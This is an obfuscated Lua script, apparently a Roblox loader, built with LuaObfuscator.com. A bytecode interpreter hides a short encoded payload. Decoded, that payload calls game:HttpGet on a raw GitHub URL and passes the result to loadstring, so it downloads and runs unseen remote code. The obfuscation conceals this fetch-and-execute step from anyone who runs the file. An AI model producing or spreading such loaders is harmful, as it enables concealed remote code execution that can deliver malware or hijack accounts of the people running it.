--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v83=(0 + 0) -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-((1328 -396) -((1922 -(68 + 997)) + 74))) -(v32-((1839 -(226 + 1044)) -(367 + 201)))) + (928 -(214 + 713)))) ;return v84-(v84%(1 + 0)) ;end end else local v85=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v85 + v85))>=v85) and (1638 -(1523 + 114))) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 -0 ;local v35;local v36;local v37;local v38;while true do if (v34==(117 -(32 + 63 + 22))) then v35,v36,v37,v38=v1(v16,v19,v19 + 3 + 0 );v19=v19 + 1 + 3 ;v34=351 -(87 + 263) ;end if (((719 -538) -(67 + 113))==v34) then return (v38 * 16777216) + (v37 * (48056 + 17480)) + (v36 * ((2165 -(802 + 150)) -(892 + 65))) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 -0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==3) then local v91=0 -0 ;while true do if (v91==0) then v46=nil;v47=nil;v91=1;end if (v91==(342 -(218 + 123))) then v39=1585 -(1535 + 46) ;break;end end end if (v39==(0 + 0)) then local v92=0;while true do if (v92==(0 + 0)) then v40=560 -(306 + 254) ;v41=nil;v92=1;end if (v92==1) then v39=1 + 0 ;break;end end end if (v39==(3 -1)) then local v93=0;while true do if ((1468 -(899 + 568))~=v93) then else v39=2 + 1 ;break;end if (0~=v93) then else v44=nil;v45=nil;v93=1;end end end if (v39~=1) then else v42=nil;v43=nil;v39=4 -2 ;end if (v39==4) then while true do if (v40==(606 -(268 + 335))) then v47=nil;while true do local v102=0;local v103;while true do if (0==v102) then v103=290 -(60 + 230) ;while true do if (v103~=(573 -(426 + 146))) then else if (v41==(1 + 0)) then local v152=1456 -(282 + 1174) ;while true do if (1==v152) then v47={};v41=2;break;end if (v152~=0) then else local v157=0;local v158;while true do if (v157==(811 -(569 + 242))) then v158=0;while true do if (v158==(2 -1)) then v152=1 + 0 ;break;end if (v158==(1024 -(706 + 318))) then v45={v42,v43,nil,v44};v46=v24();v158=1;end end break;end end end end end if (v41==(700 -(271 + 429))) then local v153=0;local v154;while true do if (v153==0) then v154=0 + 0 ;while true do if (v154==1) then v44={};v41=1501 -(1408 + 92) ;break;end if (v154==(1086 -(461 + 625))) then v42={};v43={};v154=1289 -(993 + 295) ;end end break;end end end break;end if (v103~=(0 + 0)) then else local v138=1171 -(418 + 753) ;local v139;while true do if (v138==(0 + 0)) then v139=0 + 0 ;while true do if (0==v139) then local v159=0 + 0 ;while true do if (v159==1) then v139=1 + 0 ;break;end if (v159==0) then if (v41~=(531 -(406 + 123))) then else local v160=1769 -(1749 + 20) ;local v161;while true do if ((0 + 0)==v160) then v161=1322 -(1249 + 73) ;while true do if ((0 + 0)==v161) then local v164=0;while true do if (v164==0) then for v171=1,v46 do local v172=0;local v173;local v174;local v175;while true do if (v172==(1145 -(466 + 679))) then v173=0 -0 ;v174=nil;v172=2 -1 ;end if (v172==1) then v175=nil;while true do if (0==v173) then local v186=1900 -(106 + 1794) ;local v187;while true do if (v186==(0 + 0)) then v187=0 + 0 ;while true do if (v187~=0) then else local v190=0 -0 ;while true do if (v190==(0 -0)) then v174=v22();v175=nil;v190=1;end if (1~=v190) then else v187=1;break;end end end if (v187==(115 -(4 + 110))) then v173=1;break;end end break;end end end if (v173~=1) then else if (v174==(585 -(57 + 527))) then v175=v22()~=0 ;elseif (v174==(1429 -(41 + 1386))) then v175=v25();elseif (v174==(106 -(17 + 86))) then v175=v26();end v47[v171]=v175;break;end end break;end end end v45[3 + 0 ]=v22();v164=1 -0 ;end if (v164~=(2 -1)) then else v161=1;break;end end end if (v161==(167 -(122 + 44))) then for v166=1 -0 ,v24() do local v167=0 -0 ;local v168;local v169;while true do if (0==v167) then local v176=0;while true do if ((1 + 0)==v176) then v167=1;break;end if (v176==(0 + 0)) then v168=0 -0 ;v169=nil;v176=1;end end end if (v167~=(66 -(30 + 35))) then else while true do if (v168==0) then v169=v22();if (v21(v169,1 + 0 ,1258 -(1043 + 214) )==0) then local v179=0;local v180;local v181;local v182;local v183;local v184;local v185;while true do if ((11 -8)~=v179) then else while true do if (v180~=1) then else local v189=1212 -(323 + 889) ;while true do if (v189==(2 -1)) then v180=2;break;end if (v189==(580 -(361 + 219))) then v183=nil;v184=nil;v189=1;end end end if (0==v180) then v181=0;v182=nil;v180=321 -(53 + 267) ;end if (v180==(1 + 1)) then v185=nil;while true do if (v181~=0) then else local v191=413 -(15 + 398) ;while true do if (v191~=0) then else local v193=0;while true do if (v193==0) then v182=982 -(18 + 964) ;v183=nil;v193=1;end if (v193~=1) then else v191=3 -2 ;break;end end end if (v191~=1) then else v181=1 + 0 ;break;end end end if (v181==1) then local v192=0 + 0 ;while true do if (v192==1) then v181=852 -(20 + 830) ;break;end if ((0 + 0)==v192) then v184=nil;v185=nil;v192=1;end end end if (v181~=(128 -(116 + 10))) then else while true do if ((1 + 1)==v182) then local v194=0;local v195;local v196;while true do if (v194==1) then while true do if ((738 -(542 + 196))~=v195) then else v196=0;while true do if (v196~=0) then else local v209=0;local v210;while true do if ((0 -0)==v209) then v210=0;while true do if (v210==1) then v196=1 + 0 ;break;end if (v210==0) then if (v21(v184,1 + 0 ,1 + 0 )==(2 -1)) then v185[4 -2 ]=v47[v185[1553 -(1126 + 425) ]];end if (v21(v184,2,407 -(118 + 287) )==(3 -2)) then v185[3]=v47[v185[3]];end v210=1122 -(118 + 1003) ;end end break;end end end if (v196==(2 -1)) then v182=380 -(142 + 235) ;break;end end break;end end break;end if (0==v194) then v195=0 -0 ;v196=nil;v194=1 + 0 ;end end end if (v182~=3) then else if (v21(v184,980 -(553 + 424) ,3)==1) then v185[4]=v47[v185[4]];end v42[v166]=v185;break;end if (v182~=0) then else local v198=0;local v199;local v200;while true do if ((0 -0)==v198) then v199=0 + 0 ;v200=nil;v198=1 + 0 ;end if (v198~=(1 + 0)) then else while true do if (v199~=(0 + 0)) then else v200=0 + 0 ;while true do if (v200~=1) then else v182=1;break;end if (v200==(0 -0)) then local v211=0;while true do if (v211==(2 -1)) then v200=1;break;end if (v211==(0 -0)) then v183=v21(v169,1 + 1 ,3);v184=v21(v169,4,28 -22 );v211=1;end end end end break;end end break;end end end if (v182==1) then local v201=0;while true do if (v201==1) then v182=2;break;end if (v201==(753 -(239 + 514))) then v185={v23(),v23(),nil,nil};if (v183==(1329 -(797 + 532))) then local v204=0;local v205;local v206;local v207;while true do if (v204~=1) then else v207=nil;while true do if (v205==1) then while true do if (v206~=(0 + 0)) then else v207=0;while true do if (v207~=0) then else v185[2 + 1 ]=v23();v185[9 -5 ]=v23();break;end end break;end end break;end if (v205~=0) then else local v213=1202 -(373 + 829) ;while true do if (v213==1) then v205=732 -(476 + 255) ;break;end if (0~=v213) then else v206=0;v207=nil;v213=1;end end end end break;end if (v204==0) then v205=1130 -(369 + 761) ;v206=nil;v204=1;end end elseif (v183==1) then v185[3]=v24();elseif (v183==2) then v185[2 + 1 ]=v24() -((2 -0)^(29 -13)) ;elseif (v183~=3) then else local v214=238 -(64 + 174) ;while true do if (v214==(0 + 0)) then v185[3]=v24() -((2 -0)^16) ;v185[340 -(144 + 192) ]=v23();break;end end end v201=217 -(42 + 174) ;end end end end break;end end break;end end break;end if (v179==(0 + 0)) then v180=0 + 0 ;v181=nil;v179=1 + 0 ;end if (v179~=1) then else v182=nil;v183=nil;v179=1506 -(363 + 1141) ;end if ((1582 -(1183 + 397))==v179) then v184=nil;v185=nil;v179=8 -5 ;end end end break;end end break;end end end v41=3 + 0 ;break;end end break;end end end if (3~=v41) then else local v162=0 + 0 ;local v163;while true do if (0~=v162) then else v163=1975 -(1913 + 62) ;while true do if (v163==(0 + 0)) then local v165=0 -0 ;while true do if (v165==(1933 -(565 + 1368))) then for v177=3 -2 ,v24() do v43[v177-(1662 -(1477 + 184)) ]=v29();end return v45;end end end end break;end end end v159=1 -0 ;end end end if (v139~=(1 + 0)) then else v103=857 -(564 + 292) ;break;end end break;end end end end break;end end end break;end if (v40==(2 -0)) then local v99=0;while true do if (v99~=1) then else v40=8 -5 ;break;end if (v99==0) then v45=nil;v46=nil;v99=1;end end end if (v40==(304 -(244 + 60))) then local v100=0 + 0 ;while true do if (0~=v100) then else v41=476 -(41 + 435) ;v42=nil;v100=1002 -(938 + 63) ;end if (1~=v100) then else v40=1 + 0 ;break;end end end if (v40==(1126 -(936 + 189))) then local v101=0 + 0 ;while true do if (v101==(1614 -(1565 + 48))) then v40=2 + 0 ;break;end if (v101==(1138 -(782 + 356))) then v43=nil;v44=nil;v101=1;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=268 -(176 + 91) ;local v51=(v21(v49,2 -1 ,29 -9 ) * ((1094 -(975 + 117))^(1907 -(157 + 1718)))) + v48 ;local v52=v21(v49,18 + 3 ,978 -(245 + 702) );local v53=((v21(v49,32)==(3 -(6 -4))) and  -(3 -2)) or (1019 -(697 + 321)) ;if (v52==((0 + 0) -0)) then if (v51==(0 -0)) then return v53 * (0 -0) ;else local v94=0 + 0 ;while true do if (v94==(0 -0)) then v52=(1900 -(260 + 1638)) -1 ;v50=0;break;end end end elseif (v52==2047) then return ((v51==(1227 -(322 + 905))) and (v53 * ((612 -(602 + 9))/(440 -(382 + 58))))) or (v53 * NaN) ;end return v8(v53,v52-(2212 -(449 + 740)) ) * (v50 + (v51/(2^(924 -(826 + (147 -101)))))) ;end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(0 + 0)) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1 -0) );v19=v19 + v54 ;local v56={};for v67=2 -1 , #v55 do v56[v67]=v2(v1(v3(v55,v67,v67)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58,v59=v1(v16,v19,v19 + (1207 -(902 + 303)) );v19=v19 + 2 ;return (v59 * (561 -305)) + v58 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v86=0;local v87;while true do if (v86==0) then v87=v2(v0(v60,16));if v20 then local v104=0;local v105;while true do if (v104==0) then v105=v5(v87,v20);v20=nil;v104=1;end if (v104==1) then return v105;end end else return v87;end break;end end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v28;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=6) then if (v82<=2) then if (v82<=0) then local v106=0;local v107;while true do if (v106==0) then v107=v81[2];v79[v107]=v79[v107](v13(v79,v107 + 1 ,v74));break;end end elseif (v82==1) then v79[v81[2]]=v81[3];else v79[v81[2]]();end elseif (v82<=4) then if (v82>3) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==0) then v113=v81[2];v114,v115=v72(v79[v113](v13(v79,v113 + 1 ,v81[3])));v112=1;end if (v112==1) then v74=(v115 + v113) -1 ;v116=0;v112=2;end if (v112==2) then for v147=v113,v74 do v116=v116 + 1 ;v79[v147]=v114[v116];end break;end end else v79[v81[2]]();end elseif (v82>5) then do return;end else local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==2) then for v150=v118,v74 do local v151=0;while true do if (0==v151) then v121=v121 + 1 ;v79[v150]=v119[v121];break;end end end break;end if (v117==0) then v118=v81[2];v119,v120=v72(v79[v118](v13(v79,v118 + 1 ,v81[3])));v117=1;end if (v117==1) then v74=(v120 + v118) -1 ;v121=0;v117=2;end end end elseif (v82<=9) then if (v82<=7) then local v108=v81[2];v79[v108]=v79[v108](v13(v79,v108 + 1 ,v74));elseif (v82==8) then v79[v81[2]]=v63[v81[3]];else local v124=0;local v125;local v126;while true do if (0==v124) then v125=v81[2];v126=v79[v81[3]];v124=1;end if (v124==1) then v79[v125 + 1 ]=v126;v79[v125]=v126[v81[4]];break;end end end elseif (v82<=11) then if (v82==10) then local v127=v81[2];local v128=v79[v81[3]];v79[v127 + 1 ]=v128;v79[v127]=v128[v81[4]];else v79[v81[2]]=v81[3];end elseif (v82==12) then v79[v81[2]]=v63[v81[3]];else do return;end end v73=v73 + 1 ;end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403393O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61636B6F6C38342F536F757263652F6D61696E2F596500083O0012083O00013O001208000100023O002009000100010003001201000300044O0005000100039O0000022O00033O000100012O00063O00017O00",v9(),...);end
